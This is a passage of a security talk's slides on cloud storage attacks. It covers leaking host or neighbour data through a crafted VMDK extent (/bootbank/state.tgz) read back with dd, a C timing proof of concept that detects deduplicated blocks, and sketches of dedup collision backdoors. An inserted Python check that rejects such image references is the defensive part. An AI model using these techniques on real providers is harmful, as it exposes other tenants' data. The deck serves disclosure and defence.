    version=1
    encoding="UTF-8"
    CID=b5892a19
    parentCID=ffffffff
    isNativeSnapshot="no"
    createType="vmfs"

    # Extent description
    RW 33554432 VMFS "debian-test-flat.vmdk"
    RW 0 VMFS "/bootbank/state.tgz"

    # The Disk Data Base
    #DDB

    ddb.virtualHWVersion = "8"
    ddb.longContentID = "312b4792544af9a8c959d20eb5892a19"
    ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c"
    ddb.geometry.cylinders = "2088"
    ddb.geometry.heads = "255"
    ddb.geometry.sectors = "63"
    ddb.adapterType = "lsilogic"

25. Retrieving data
• The added extent is accessible at the end of the disk device
• We only have to skip the beginning of the disk to retrieve the needed piece of data
• In our case:

    dd if=/dev/sda of=leaked_img skip=33554432 bs=512
    25+0 records in
    25+0 records out
    12800 bytes transferred in 0.020000 secs (640001 bytes/sec)

26. Caveats
• Hard to guess other VMs' .vmdk filenames and paths
• .gz files are truncated to the closest multiple of 512 bytes

27. Real-world attack possibilities
• Unlikely to be able to forge these "snapshots" through the API
• Should be really useful when the user is able to upload his own images
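Both descriptor tricks shown above (a qcow2 whose backing file is /etc/passwd on slide 19, a VMDK extent pointing at another image or at /bootbank/state.tgz on slides 23-24) are exactly what an image-upload path on the provider side has to refuse. The following admission check is an added example and not part of the deck: it reads the backing-file field from the fixed qcow2 header and the extent lines from a VMDK descriptor, and flags any reference that resolves outside the directory the image was uploaded to. The upload directory, the sample descriptor and the qcow2 header builder are constructed for the example.

```python
"""Admission check for customer-uploaded disk images (added example).

Flags qcow2 backing files and VMDK extent files that resolve outside the
directory the image was uploaded to. All sample data below is constructed."""
import os
import re
import struct

QCOW_MAGIC = b"QFI\xfb"
# VMDK extent line: access  size-in-sectors  type  "filename"  [offset]
EXTENT_RE = re.compile(r'^\s*(RW|RDONLY|NOACCESS)\s+(\d+)\s+(\w+)\s+"([^"]+)"')


def escapes(base_dir, ref):
    """True if `ref`, interpreted relative to base_dir, resolves outside it.
    Absolute refs such as /bootbank/state.tgz escape by construction."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, ref))
    return os.path.commonpath([base, target]) != base


def vmdk_external_refs(descriptor_text, base_dir):
    """Extent filenames in a .vmdk descriptor that escape base_dir."""
    bad = []
    for line in descriptor_text.splitlines():
        m = EXTENT_RE.match(line)
        if m and escapes(base_dir, m.group(4)):
            bad.append(m.group(4))
    return bad


def qcow2_backing_file(data):
    """Backing file name from the fixed qcow2 header, or None if there is none.
    The header starts with magic(4) version(4) backing_file_offset(8)
    backing_file_size(4), all big-endian."""
    magic, version, off, size = struct.unpack(">4sIQI", data[:20])
    if magic != QCOW_MAGIC or version not in (2, 3):
        raise ValueError("not a qcow2 image")
    if size == 0:
        return None
    return data[off:off + size].decode("utf-8", errors="replace")


def qcow2_external_ref(data, base_dir):
    """The backing file name if it escapes base_dir, else None."""
    ref = qcow2_backing_file(data)
    return ref if ref is not None and escapes(base_dir, ref) else None


def make_qcow2(backing=None):
    """Constructed minimal qcow2 v3 header; the backing name is placed
    right after the 104-byte header, as qemu-img lays it out."""
    name = backing.encode() if backing else b""
    hdr = struct.pack(">4sIQI", QCOW_MAGIC, 3, 104 if name else 0, len(name))
    return hdr.ljust(104, b"\0") + name


# Constructed descriptor mirroring the ".vmdk modified #2" slide
SAMPLE_VMDK = """# Disk DescriptorFile
version=1
createType="vmfs"
# Extent description
RW 33554432 VMFS "debian-test-flat.vmdk"
RW 0 VMFS "/bootbank/state.tgz"
"""

if __name__ == "__main__":
    upload_dir = "/srv/images/upload-1234"   # constructed path
    print(vmdk_external_refs(SAMPLE_VMDK, upload_dir))        # ['/bootbank/state.tgz']
    print(qcow2_external_ref(make_qcow2("/etc/passwd"), upload_dir))  # /etc/passwd
```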
28. Deduplication
• Snapshots are not enough for optimizing storage usage
• The filer (or file systems like ZFS) provides deduplication of redundant blocks
• Each time two redundant blocks are found, one block is replaced by a link
• If a block is rewritten, the entire block needs to be written

29. Identify deduplication
• If only one byte is written, the whole deduplicated block needs to be written
• Sounds like a write penalty
• We will conduct timing attacks in order to identify this penalty

30. Caveat #1
• Deduplication may be asynchronous
• The attack needs to wait for the deduplication process to occur
• Since deduplication happens only on the filer, the VM does not need to run while waiting for deduplication; only the volume needs to remain during the wait

31. Caveat #2
• Deduplication is filer-centric
• Some filers work on NFS exports at file level => no attack possible
• Blocks may be misaligned between the VM file system and the actual filer => unlikely to be seen, since this means a severe performance issue; the cloud provider will work for us and avoid this case

32. Caveat #3
• OS / file system cache
• Empty the Linux cache before doing anything else
• Use direct IO for writing

33. What exploitation looks like
• Create files that may be deduplicated and random files on your own VM
• Wait (maybe 24 hours if dedup is a daily cron job)
• Flush the Linux file caches
• Write one byte per block on each block (usually 4KB)
• Compare timings on random files vs deduplicated files

34. Flush Linux file cache
• The cache behaviour of Linux is unpredictable
• We need a tool to show and flush the Linux file cache
• vmtouch is this tool (thx to hoytech)
• https://github.com/hoytech/vmtouch

35. Writes and time measurement
• Avoid python/ruby/java/...
• Need to use direct IOs
• Need to be far more precise than the UNIX time command (ms precision)
• Solution: a simple C program

36. .c POC

    #define _GNU_SOURCE            /* for O_DIRECT */
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <time.h>
    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Difference between two timespecs, in nanoseconds */
    int64_t timespecDiff(struct timespec *timeA_p, struct timespec *timeB_p)
    {
        return ((int64_t)timeA_p->tv_sec * 1000000000LL + timeA_p->tv_nsec)
             - ((int64_t)timeB_p->tv_sec * 1000000000LL + timeB_p->tv_nsec);
    }

    int main(int argc, char **argv)
    {
        int f;
        void *buf;
        struct timespec start, end;
        if (argc < 2) { fprintf(stderr, "usage: %s file\n", argv[0]); return 1; }
        /* O_DIRECT needs a sector-aligned buffer and transfer size, so the
           smallest direct write is one 512-byte sector, still well below the
           4KB dedup block being timed */
        if (posix_memalign(&buf, 512, 512) != 0) return 1;
        memset(buf, 'A', 512);
        f = open(argv[1], O_WRONLY | O_DIRECT);
        if (f < 0) { perror("open"); return 1; }
        clock_gettime(CLOCK_MONOTONIC, &start);
        if (write(f, buf, 512) != 512) perror("write");
        clock_gettime(CLOCK_MONOTONIC, &end);
        /* elapsed time of the single direct write, in nanoseconds */
        printf("%lld\n", (long long)timespecDiff(&end, &start));
        close(f);
        free(buf);
        return 0;
    }

38. Limitations of this POC
• Only focuses on the first block of a file
• Lack of automation
• Lack of block size guessing (needed in order to correct the first limitation)

39. Impacts / Counter-measures
• Could be used to find out whether your cloud neighbourhood has:
• unpatched binaries on their VMs
• files that belong to you (data leak detection)
• Not limited to VMs: the provider may also have hypervisor data on the filer
• Counter-measure: encrypt all your stuff in order to have different RAW blocks for the same piece of data

40. Corrupting dedup
• Work in progress:
– generating a collision on the dedup table
– when users try to write a legitimate file, it is deduped to your backdoored version
• Difficulties:
– Each filer / file system has its own checksum algorithm: you need to gather information about the storage infrastructure
– Filers / file systems using weak checksums usually perform a bit-per-bit comparison before dedup (for instance NetApp)
– Finding usable collisions on a strong checksum algorithm is really hard (for instance ZFS uses AES-256)

41. Denial of Service via Dedup
• Not tested yet
• Only usable with solutions with weak checksum + bit-per-bit comparison
• Attack scenario:
– generate a maximum of collisions thanks to the weak algorithm

42. Solutions: provider side
• Innovative solutions need to be security assessed more than usual
• Internal security actions need to be publicly known and measurable
• Solutions:
– internal skilled security teams
– certifications and external audit policies

43. Solutions: customer/user side
• Customers cannot blindly trust any cloud provider
• Counter-measures are available on the customer side:
– Avoid storing sensitive data unencrypted
– Add firewall / IDS / IPS directly on VMs
– Ensure the quality and reliability of the selected provider

44. Conclusions
• New technologies bring new threats
• Other attacks available:
• VM memory overlapping host memory (VMSA-2012-0009.2)
• Xen SYSRET instruction (CVE-2012-0217)
• ...
• New threats do not always mean new ways to fight these threats

45. Questions?
• Thanks: @hackerzvoice & @outscale
• Contacts: @majin_boo
CrashFR will never die in our living memories